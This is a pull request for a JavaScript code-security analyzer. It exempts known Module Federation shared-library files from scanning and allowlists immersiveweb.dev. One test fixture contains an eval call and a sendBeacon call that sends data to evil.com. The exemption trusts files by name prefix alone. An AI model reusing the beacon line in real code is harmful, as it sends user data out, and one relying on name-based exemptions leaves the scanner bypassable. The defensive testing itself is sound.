### PR TITLE
fix: 共有ライブラリのスキャン除外と immersiveweb.dev 許可（v0.2.2）

### DIFF
--- a/__tests__/analyzer.test.ts
+++ b/__tests__/analyzer.test.ts
@@ -1,5 +1,6 @@
 import { describe, it, expect } from 'vitest'
 import { analyzeCodeSecurity } from '../src/analyzer.js'
+import { CodeSecurityService } from '../src/index.js'
 import { adjustViolationSeverity, determineFileContext } from '../src/utils/file-context.js'
 import type { FileContext } from '../src/types.js'
 
@@ -625,6 +626,29 @@ describe('adjustViolationSeverity - ファイルコンテキスト別の抑制',
       expect(context.isUserCode).toBe(true)
       expect(context.isBundledDependency).toBe(false)
     })
+
+    it.each([
+      ['react', '__federation_shared_react-abc123.js'],
+      ['react/jsx-runtime', '__federation_shared_react/jsx-runtime-abc123.js'],
+      ['react-dom', '__federation_shared_react-dom-abc123.js'],
+      ['react-dom/client', '__federation_shared_react-dom/client-abc123.js'],
+      ['three', '__federation_shared_three-abc123.js'],
+      ['three/addons', '__federation_shared_three/addons-B-heIOzx.js'],
+      ['@react-three/fiber', '__federation_shared_@react-three/fiber-abc123.js'],
+      ['@react-three/drei', '__federation_shared_@react-three/drei-abc123.js'],
+      ['@react-three/rapier', '__federation_shared_@react-three/rapier-abc123.js'],
+      ['@xrift/world-components', '__federation_shared_@xrift/world-components-abc123.js'],
+    ])('%s は共有ライブラリとして判定される', (_pkg, path) => {
+      const context = determineFileContext(path)
+      expect(context.isSharedLibrary).toBe(true)
+      expect(context.isBundledDependency).toBe(false)
+    })
+
+    it('未知の __federation_shared_ パッケージは共有ライブラリとして判定されない', () => {
+      const context = determineFileContext('__federation_shared_unknown-pkg-abc123.js')
+      expect(context.isSharedLibrary).toBe(false)
+      expect(context.isBundledDependency).toBe(true)
+    })
   })
 })
 
@@ -992,5 +1016,54 @@ describe('バイパスパターン検出の強化', () => {
 
       expect(signals.detectedViolations.filter(v => v.rule === 'no-unauthorized-domain')).toHaveLength(0)
     })
+  })
+})
+
+describe('Issue #25 - 共有ライブラリのスキャンスキップ', () => {
+  const service = new CodeSecurityService()
+
+  it('__federation_shared_* ファイルはスキャンされず valid: true を返す', () => {
+    const code = `
+      eval("malicious code")
+      navigator.sendBeacon("https://evil.com", data)
+    `
+    const context: FileContext = {
+      filePath: '__federation_shared_three-addons-B-heIOzx.js',
+      isUserCode: false,
+      isSharedLibrary: true,
+      isBundledDependency: false,
+    }
+
+    const result = service.validate({ code, fileContext: context })
+
+    expect(result.valid).toBe(true)
+    expect(result.violations.critical).toHaveLength(0)
+    expect(result.violations.warnings).toHaveLength(0)
+  })
+
+  it('バンドル依存ファイルは引き続きスキャンされる', () => {
+    const code = `eval("malicious")`
+    const context: FileContext = {
+      filePath: 'some-lib-abc123.js',
+      isUserCode: false,
+      isSharedLibrary: false,
+      isBundledDependency: true,
+    }
+
+    const result = service.validate({ code, fileContext: context })
+
+    expect(result.valid).toBe(false)
+  })
+})
+
+describe('Issue #25 - immersiveweb.dev は許可ドメイン', () => {
+  it('.src に immersiveweb.dev の URL を代入しても違反にならない', () => {
+    const code = `
+      img.src = 'https://immersiveweb.dev/ar-module/'
+    `
+
+    const signals = analyzeCodeSecurity(code)
+
+    expect(signals.detectedViolations.filter(v => v.rule === 'no-unauthorized-domain')).toHaveLength(0)
   })
 })

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@xrift/code-security",
-  "version": "0.2.1",
+  "version": "0.2.2",
   "type": "module",
   "description": "Code security analyzer powered by acorn",
   "main": "./dist/index.js",

--- a/scripts/regression-test.ts
+++ b/scripts/regression-test.ts
@@ -54,6 +54,12 @@ for (const distPath of distDirs) {
     const code = readFileSync(filePath, 'utf-8')
     const fileName = filePath.replace(distPath + '/', '')
     const context = determineFileContext(fileName)
+
+    // 共有ライブラリはホスト提供のためスキャン不要
+    if (context.isSharedLibrary) {
+      continue
+    }
+
     const signals = analyzeCodeSecurity(code)
 
     // adjustViolationSeverity を通して、最終的に残る violation をチェック

--- a/src/index.ts
+++ b/src/index.ts
@@ -23,6 +23,21 @@ export class CodeSecurityService {
     // ファイルコンテキストを判定（指定されていない場合は自動判定）
     const fileContext = request.fileContext || determineFileContext(request.code)
 
+    // 共有ライブラリはホストが提供するためスキャン不要
+    if (fileContext.isSharedLibrary) {
+      return {
+        valid: true,
+        securityScore: 0,
+        violations: { critical: [], warnings: [] },
+        analysis: {
+          entropy: 0,
+          suspiciousPatterns: [],
+          detectedAPIs: [],
+          externalDependencies: [],
+        },
+      }
+    }
+
     // セキュリティ解析実行
     const signals = analyzeCodeSecurity(
       request.code,
@@ -109,5 +124,5 @@ export class CodeSecurityService {
 
 export { analyzeCodeSecurity } from './analyzer.js'
 export { calculateSecurityScore, getSecurityVerdict } from './scoring.js'
-export { determineFileContext, adjustViolationSeverity } from './utils/file-context.js'
+export { determineFileContext, adjustViolationSeverity, PLATFORM_SHARED_PACKAGES } from './utils/file-context.js'
 export * from './types.js'

--- a/src/utils/file-context.ts
+++ b/src/utils/file-context.ts
@@ -1,11 +1,41 @@
 import type { FileContext } from '../types.js'
 
 /**
+ * ホストが提供するプラットフォーム共有パッケージ
+ * これらの __federation_shared_* ファイルのみスキャン対象から除外される
+ */
+export const PLATFORM_SHARED_PACKAGES = [
+  'react',
+  'react-dom',
+  'three',
+  '@react-three/fiber',
+  '@react-three/drei',
+  '@react-three/rapier',
+  '@xrift/world-components',
+]
+
+/**
+ * ファイルパスがプラットフォーム共有パッケージに該当するか判定
+ */
+function isKnownSharedPackage(filePath: string): boolean {
+  const prefix = '__federation_shared_'
+  const idx = filePath.indexOf(prefix)
+  if (idx === -1) return false
+
+  const afterPrefix = filePath.substring(idx + prefix.length)
+  return PLATFORM_SHARED_PACKAGES.some(pkg =>
+    afterPrefix === pkg ||
+    afterPrefix.startsWith(pkg + '/') ||
+    afterPrefix.startsWith(pkg + '-')
+  )
+}
+
+/**
  * ファイルパスからコンテキストを判定
  *
  * 判定ロジック:
  * - __federation_expose_World: ユーザーコード (最も厳格)
- * - __federation_shared_: 共有ライブラリ (Module Federationが自動生成、緩和可能)
+ * - __federation_shared_ + 既知パッケージ: 共有ライブラリ (ホスト提供、スキャン除外)
  * - __federation_fn_import: Module Federationインフラ (厳格)
  * - remoteEntry.js: Module Federationエントリーポイント (Module Federationが自動生成、緩和可能)
  * - その他: バンドルされた依存ライブラリ (緩和可能)
@@ -16,10 +46,8 @@ export function determineFileContext(filePath: string): FileContext {
   // 1. ユーザーコード（__federation_expose_World-*.js）
   const isUserCode = fileName.includes('__federation_expose_World-') && fileName.endsWith('.js')
 
-  // 2. 共有ライブラリ（__federation_shared_*/*.js）
-  const isSharedLibrary =
-    fileName.startsWith('__federation_shared_') ||
-    filePath.includes('__federation_shared_')
+  // 2. 共有ライブラリ（既知のプラットフォーム共有パッケージのみ）
+  const isSharedLibrary = isKnownSharedPackage(filePath)
 
   // 3. バンドルされた依存ライブラリ（その他の*.js）
   const isBundledDependency =

--- a/src/utils/helpers.ts
+++ b/src/utils/helpers.ts
@@ -93,10 +93,11 @@ export const ALLOWED_PACKAGES = [
 ]
 
 /**
- * 許可されたドメイン（CDN）
+ * 許可されたドメイン（CDN・標準仕様）
  */
 export const ALLOWED_DOMAINS = [
   'cdn.jsdelivr.net',
   'unpkg.com',
   'esm.sh',
+  'immersiveweb.dev',   // W3C Immersive Web: WebXR 機能記述子 URL として使用
 ]


### PR DESCRIPTION
## Summary
- `__federation_shared_*` のうち既知のプラットフォーム共有パッケージのみスキャン対象から除外
- `immersiveweb.dev` を許可ドメインに追加（W3C WebXR 機能記述子 URL）
- パッチバージョンを `0.2.2` に更新

## 背景
three.js addons の共有ライブラリ内に含まれる `eval()` と `immersiveweb.dev` への参照が誤検知されていた。共有ライブラリはホストが提供する vetted パッケージであり、ワールド開発者が修正できないコードでの reject は不適切。

## 変更詳細
- `src/utils/file-context.ts`: `PLATFORM_SHARED_PACKAGES` 定数を追加し、`isSharedLibrary` 判定を既知パッケージのみに限定
  - react, react-dom, three, @react-three/fiber, @react-three/drei, @react-three/rapier, @xrift/world-components
  - 未知の `__federation_shared_*` パッケージはバンドル依存として通常スキャンされる
- `src/index.ts`: `validate()` で共有ライブラリをスキャンスキップ、`PLATFORM_SHARED_PACKAGES` を export
- `src/utils/helpers.ts`: `ALLOWED_DOMAINS` に `immersiveweb.dev` を追加
- `scripts/regression-test.ts`: 共有ライブラリファイルをスキップ

## Test plan
- [x] `npm test` — 139 tests passed
- [x] リグレッションテスト — plateau-test, xrcc, xrift-world-template 全て合格
- [x] 既知の10パッケージ全てが `isSharedLibrary: true` に判定されるテスト
- [x] 未知パッケージが `isBundledDependency: true` に判定されるテスト

🤖 Generated with [Claude Code](https://claude.com/claude-code)